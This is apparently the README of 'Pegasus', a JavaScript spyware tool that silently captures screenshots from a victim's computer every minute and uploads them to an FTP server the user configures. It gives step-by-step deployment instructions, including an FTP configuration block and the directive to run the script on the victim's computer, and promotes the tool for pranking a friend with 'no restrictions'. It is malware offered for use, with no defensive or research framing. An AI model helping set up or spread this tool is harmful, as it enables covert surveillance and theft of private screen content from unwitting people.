Pegasus is a lightweight spyware made from JavaScript. This script can take screenshots from victim's pc and upload them to the ftp server you provide in the script.
-
Insert your ftp server details to the script.
48. const ftpConfig = { 49. host: 'ftp.example.com', 50. port: 21, // Default FTP port is 21 51. user: 'username', 52. password: 'password' 53. };
-
In your ftp server root directory, create a new folder named
screenshots
. This is the folder where victim's screenshots will upload. -
Run the script on victim's computer. After running this on the victim's computer, a new folder will appear in the
screenshots
folder with the public ip address of the victim. In that folder you will see screenshots of the victim. Screenshots will upload every 1 minute.
- If you want to give some fun to a friend, then you can use this tool.
- You can get anything from this code and make your own tool.
- No restrictions
- No copytight
- No lisence
- Free Software, Hell Yeah!